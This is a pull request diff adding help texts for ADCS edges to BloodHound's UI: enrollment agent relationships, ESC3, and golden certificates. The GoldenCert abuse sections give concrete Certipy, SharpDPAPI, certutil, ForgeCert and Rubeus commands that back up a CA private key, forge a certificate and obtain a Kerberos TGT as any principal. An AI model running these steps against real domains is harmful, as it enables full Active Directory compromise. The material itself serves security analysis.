### PR TITLE
BED-3869: ADCS edges help text

### DIFF
--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/DelegatedEnrollmentAgent.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/DelegatedEnrollmentAgent.tsx
@@ -1,0 +1,31 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import General from './General';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
+import Opsec from './Opsec';
+import References from './References';
+
+const DelegatedEnrollmentAgent = {
+    general: General,
+    windowsAbuse: WindowsAbuse,
+    linuxAbuse: LinuxAbuse,
+    opsec: Opsec,
+    references: References,
+};
+
+export default DelegatedEnrollmentAgent;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/General.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/General.tsx
@@ -1,0 +1,38 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { typeFormat } from '../utils';
+import { EdgeInfoProps } from '../index';
+import { Typography } from '@mui/material';
+
+const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName }) => {
+    return (
+        <>
+            <Typography variant='body2'>
+                The {typeFormat(sourceType)} {sourceName} is delegated the privilege to enroll certificates of the
+                certificate template {targetName} as an enrollment agent.
+            </Typography>
+            <Typography variant='body2'>
+                The certificate template is published to an enterprise CA where the enrollment agent restrictions
+                are configured to allow this principal to enroll certificates against this template as an enrollment
+                agent. BloodHound does not assess what principals the enrollment agent is allowed to enroll on behalf of.
+            </Typography>
+        </>
+    );
+};
+
+export default General;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/LinuxAbuse.tsx
@@ -1,0 +1,29 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const Abuse: FC = () => {
+    return (
+        <Typography variant='body2'>
+            An attacker may perform an ADCS ESC3 attack that rely on this relationship. This relationship alone is not
+            enough to escalate rights or impersonate other principals.
+        </Typography>
+    );
+};
+
+export default Abuse;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/LinuxAbuse.tsx
@@ -20,7 +20,7 @@ import { Typography } from '@mui/material';
 const Abuse: FC = () => {
     return (
         <Typography variant='body2'>
-            An attacker may perform an ADCS ESC3 attack that rely on this relationship. This relationship alone is not
+            An attacker may perform an ADCS ESC3 attack that relies on this DelegatedEnrollmentAgent relationship. This relationship alone is not
             enough to escalate rights or impersonate other principals.
         </Typography>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/Opsec.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/Opsec.tsx
@@ -1,0 +1,30 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const Opsec: FC = () => {
+    return (
+        <Typography variant='body2'>
+            When an attacker abuses a privilege escalation or impersonation primitive that relies on this relationship,
+            it will necessarily result in the issuance of a certificate. A copy of the issued certificate will be saved
+            on the host that issued the certificate.
+        </Typography>
+    );
+};
+
+export default Opsec;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/References.tsx
@@ -1,0 +1,33 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Link, Box } from '@mui/material';
+
+const References: FC = () => {
+    return (
+        <Box sx={{ overflowX: 'auto' }}>
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf'>
+                https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
+            </Link>
+        </Box>
+    );
+};
+
+export default References;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/WindowsAbuse.tsx
@@ -1,0 +1,29 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const Abuse: FC = () => {
+    return (
+        <Typography variant='body2'>
+            An attacker may perform an ADCS ESC3 attack that rely on this relationship. This relationship alone is not
+            enough to escalate rights or impersonate other principals.
+        </Typography>
+    );
+};
+
+export default Abuse;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/DelegatedEnrollmentAgent/WindowsAbuse.tsx
@@ -20,7 +20,7 @@ import { Typography } from '@mui/material';
 const Abuse: FC = () => {
     return (
         <Typography variant='body2'>
-            An attacker may perform an ADCS ESC3 attack that rely on this relationship. This relationship alone is not
+            An attacker may perform an ADCS ESC3 attack that relies on this DelegatedEnrollmentAgent relationship. This relationship alone is not
             enough to escalate rights or impersonate other principals.
         </Typography>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/EnrollOnBehalfOf.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/EnrollOnBehalfOf.tsx
@@ -1,0 +1,31 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import General from './General';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
+import Opsec from './Opsec';
+import References from './References';
+
+const EnrollOnBehalfOf = {
+    general: General,
+    windowsAbuse: WindowsAbuse,
+    linuxAbuse: LinuxAbuse,
+    opsec: Opsec,
+    references: References,
+};
+
+export default EnrollOnBehalfOf;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/General.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/General.tsx
@@ -24,7 +24,7 @@ const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName }) => {
         <>
             <Typography variant='body2'>
                 The {typeFormat(sourceType)} {sourceName} can be used to enroll certificates on behalf of other
-                principals for the CertTemplate {targetName}.
+                principals for the certificate template {targetName}.
             </Typography>
             <Typography variant='body2'>
                 The certificate template {sourceName} is configured to be used as an enrollment agent. The certificate

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/General.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/General.tsx
@@ -28,10 +28,11 @@ const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName }) => {
             </Typography>
             <Typography variant='body2'>
                 The certificate template {sourceName} is configured to be used as an enrollment agent. The certificate
-                template {targetName} is configured to allow enrollment by enrollment agents. This enables a principal
-                with a certificate of certificate template {sourceName} to enroll on behalf of other principals for
-                certificate template {targetName} as long as enrollment agent restrictions configured on the enterprise CA
-                permit it.
+                template {targetName} is configured to allow enrollment by enrollment agents. Both certificate templates
+                is published by an enterprise CA which is trusted for NT authentication and chain up to a root CA for the
+                domain. This enables a principal with a certificate of certificate template {sourceName} to enroll on
+                behalf of other principals for certificate template {targetName} as long as enrollment agent restrictions
+                configured on the enterprise CA permit it.
             </Typography>
         </>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/General.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/General.tsx
@@ -1,0 +1,40 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { typeFormat } from '../utils';
+import { EdgeInfoProps } from '../index';
+import { Typography } from '@mui/material';
+
+const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName }) => {
+    return (
+        <>
+            <Typography variant='body2'>
+                The {typeFormat(sourceType)} {sourceName} can be used to enroll certificates on behalf of other
+                principals for the CertTemplate {targetName}.
+            </Typography>
+            <Typography variant='body2'>
+                The certificate template {sourceName} is configured to be used as an enrollment agent. The certificate
+                template {targetName} is configured to allow enrollment by enrollment agents. This enables a principal
+                with a certificate of certificate template {sourceName} to enroll on behalf of other principals for
+                certificate template {targetName} as long as enrollment agent restrictions configured on the enterprise CA
+                permit it.
+            </Typography>
+        </>
+    );
+};
+
+export default General;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/General.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/General.tsx
@@ -29,7 +29,7 @@ const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName }) => {
             <Typography variant='body2'>
                 The certificate template {sourceName} is configured to be used as an enrollment agent. The certificate
                 template {targetName} is configured to allow enrollment by enrollment agents. Both certificate templates
-                is published by an enterprise CA which is trusted for NT authentication and chain up to a root CA for the
+                are published by an enterprise CA which is trusted for NT authentication and chain up to a root CA for the
                 domain. This enables a principal with a certificate of certificate template {sourceName} to enroll on
                 behalf of other principals for certificate template {targetName} as long as enrollment agent restrictions
                 configured on the enterprise CA permit it.

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/LinuxAbuse.tsx
@@ -1,0 +1,29 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const Abuse: FC = () => {
+    return (
+        <Typography variant='body2'>
+            An attacker may perform an ADCS ESC3 attack that rely on this relationship. This relationship alone is not
+            enough to escalate rights or impersonate other principals.
+        </Typography>
+    );
+};
+
+export default Abuse;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/LinuxAbuse.tsx
@@ -20,7 +20,7 @@ import { Typography } from '@mui/material';
 const Abuse: FC = () => {
     return (
         <Typography variant='body2'>
-            An attacker may perform an ADCS ESC3 attack that rely on this relationship. This relationship alone is not
+            An attacker may perform an ADCS ESC3 attack that relies on this EnrollOnBehalfOf relationship. This relationship alone is not
             enough to escalate rights or impersonate other principals.
         </Typography>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/Opsec.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/Opsec.tsx
@@ -1,0 +1,30 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const Opsec: FC = () => {
+    return (
+        <Typography variant='body2'>
+            When an attacker abuses a privilege escalation or impersonation primitive that relies on this relationship,
+            it will necessarily result in the issuance of a certificate. A copy of the issued certificate will be saved
+            on the host that issued the certificate.
+        </Typography>
+    );
+};
+
+export default Opsec;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/References.tsx
@@ -1,0 +1,33 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Link, Box } from '@mui/material';
+
+const References: FC = () => {
+    return (
+        <Box sx={{ overflowX: 'auto' }}>
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf'>
+                https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
+            </Link>
+        </Box>
+    );
+};
+
+export default References;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/WindowsAbuse.tsx
@@ -1,0 +1,29 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const Abuse: FC = () => {
+    return (
+        <Typography variant='body2'>
+            An attacker may perform an ADCS ESC3 attack that rely on this relationship. This relationship alone is not
+            enough to escalate rights or impersonate other principals.
+        </Typography>
+    );
+};
+
+export default Abuse;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/EnrollOnBehalfOf/WindowsAbuse.tsx
@@ -20,7 +20,7 @@ import { Typography } from '@mui/material';
 const Abuse: FC = () => {
     return (
         <Typography variant='body2'>
-            An attacker may perform an ADCS ESC3 attack that rely on this relationship. This relationship alone is not
+            An attacker may perform an ADCS ESC3 attack that relies on this EnrollOnBehalfOf relationship. This relationship alone is not
             enough to escalate rights or impersonate other principals.
         </Typography>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/General.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/General.tsx
@@ -1,0 +1,47 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { typeFormat } from '../utils';
+import { EdgeInfoProps } from '../index';
+import { Typography } from '@mui/material';
+
+const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName }) => {
+    return (
+        <>
+            <Typography variant='body2'>
+                The {typeFormat(sourceType)} {sourceName} has a certificate private key that can be abused to sign 
+                "golden" certificates for authentication of any enabled principal in the AD forest of domain {targetName}.
+            </Typography>
+            <Typography variant='body2'>
+                The {typeFormat(sourceType)} {sourceName} hosts the enrollment service of an enterprise CA which implies
+                it has the private key of the enterprise CA's certificate. This private key allows an attacker to sign
+                certificates for authentication as any enabled principal in the AD forest of domain {targetName}, as the
+                enterprise CA is trusted for NT authentication and chain up to a root CA.
+            </Typography>
+            <Typography variant='body2'>
+                It may not be possible to obtain the certificate private key if it is protected with a Trusted Platform
+                Module (TPM) or using a Hardware Security Module (HSM). However, it may still be possible to compromise
+                the AD forest. Administrative access to the enterprise CA host lets an attacker publish certificate
+                templates, approve denied enrollment requests, and more. The {typeFormat(sourceType)} {sourceName} will
+                have an ESC7 edge to the domain {targetName} if any such attack has been found possible by BloodHound.
+            </Typography>
+
+        </>
+    );
+};
+
+export default General;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/GoldenCert.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/GoldenCert.tsx
@@ -1,0 +1,31 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import General from './General';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
+import Opsec from './Opsec';
+import References from './References';
+
+const GoldenCert = {
+    general: General,
+    windowsAbuse: WindowsAbuse,
+    linuxAbuse: LinuxAbuse,
+    opsec: Opsec,
+    references: References,
+};
+
+export default GoldenCert;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/LinuxAbuse.tsx
@@ -1,0 +1,39 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const Abuse: FC = () => {
+    return (
+        <>
+            <Typography variant='body2'>
+                1) Back up the CA certificate with the credentials of a user with admin access on the enterprise CA host using Certipy: 
+                <Typography component={'pre'}>{"certipy ca -backup -ca 'dumpster-DC01-CA' -username jd@dumpster.fire -password 'Password123!'"}</Typography>
+                The enterprise CA certificate is the one where issuer and subject are identical.
+                <br />
+                <br />
+                2) Forge a certificate of a target principal:
+                <Typography component={'pre'}>{"certipy forge -ca-pfx dumpster-DC01-CA.pfx -upn Roshi@dumpster.fire -subject 'CN=Roshi,OU=Users,OU=Tier0,DC=dumpster,DC=fire'"}</Typography>
+                <br />
+                3) Request a TGT for the targeted principal using the certificate against a given DC:
+                <Typography component={'pre'}>{"certipy auth -pfx roshi_forged.pfx -dc-ip '192.168.100.10'"}</Typography>
+            </Typography>
+        </>
+    );
+};
+
+export default Abuse;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/Opsec.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/Opsec.tsx
@@ -1,0 +1,30 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const Opsec: FC = () => {
+    return (
+        <Typography variant='body2'>
+            When an attacker abuses a privilege escalation or impersonation primitive that relies on this relationship,
+            it will necessarily result in the issuance of a certificate. A copy of the issued certificate will be saved
+            on the host that issued the certificate.
+        </Typography>
+    );
+};
+
+export default Opsec;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/References.tsx
@@ -1,0 +1,69 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Link, Box } from '@mui/material';
+
+const References: FC = () => {
+    return (
+        <Box sx={{ overflowX: 'auto' }}>
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf'>
+                https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://github.com/GhostPack/SharpDPAPI'>
+                https://github.com/GhostPack/SharpDPAPI
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil'>
+                https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://github.com/GhostPack/ForgeCert'>
+                https://github.com/GhostPack/ForgeCert
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://github.com/GhostPack/Rubeus'>
+                https://github.com/GhostPack/Rubeus
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://github.com/ly4k/Certipy#golden-certificates'>
+                https://github.com/ly4k/Certipy#golden-certificates                
+            </Link>
+
+        </Box>
+    );
+};
+
+export default References;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GoldenCert/WindowsAbuse.tsx
@@ -1,0 +1,61 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const Abuse: FC = () => {
+    return (
+        <>
+        <Typography variant='body1'>Obtain CA certificate incl. private key - using built-in GUI (certsrv.msc)</Typography>
+            <Typography variant='body2'>
+                1) Open certsrv.msc as Administrator on the enterprise CA host.
+                <br />
+                2) Right-click on the enterprise CA and select "All Tasks" followed by "Back up CA...".
+                <br />
+                3) Click "Next", select "Private key and CA certificate", and select the location folder.
+                <br />
+                4) Click "Next", and set a password.
+                <br />
+                5) Click "Next" and click "Finish" to back up the certificate as a .p12 file.
+            </Typography>
+        <Typography variant='body1'>Obtain CA certificate incl. private key - using commandline tools</Typography>
+            <Typography variant='body2'>
+                1) Print all certificates of the host using SharpDPAPI: 
+                <Typography component={'pre'}>{"SharpDPAPI.exe certificates /machine"}</Typography>
+                The enterprise CA certificate is the one where issuer and subject are identical.
+                <br />
+                <br />
+                2) Save the private key in .key file (e.g. cert.key) and the certificate in .pem file (cert.pem) in the same folder.
+                <br />
+                3) Create a .pfx version of the CA certificate using certutil:
+                <Typography component={'pre'}>{"certutil.exe -MergePFX .\\cert.pem .\\cert.pfx"}</Typography>
+                <br />
+                4) Set password when prompted.
+            </Typography>
+        <Typography variant='body1'>Forge certificate and obtain a TGT as targeted principal</Typography>
+            <Typography variant='body2'>
+                1) Forge a certificate of a target principal using ForgeCert:
+                <Typography component={'pre'}>{"ForgeCert.exe --CaCertPath cert.pfx --CaCertPassword \"password123!\" --Subject \"CN=User\" --SubjectAltName \"roshi@dumpster.fire\" --NewCertPath target.pfx --NewCertPassword \"NewPassword123!\""}</Typography>
+                <br />
+                2) Request a TGT for the targeted principal using the certificate with Rubeus:
+                <Typography component={'pre'}>{"Rubeus.exe asktgt /user:Roshi /certificate:target.pfx /password:NewPassword123!"}</Typography>
+            </Typography>
+        </>
+    );
+};
+
+export default Abuse;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/General.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/General.tsx
@@ -1,0 +1,35 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
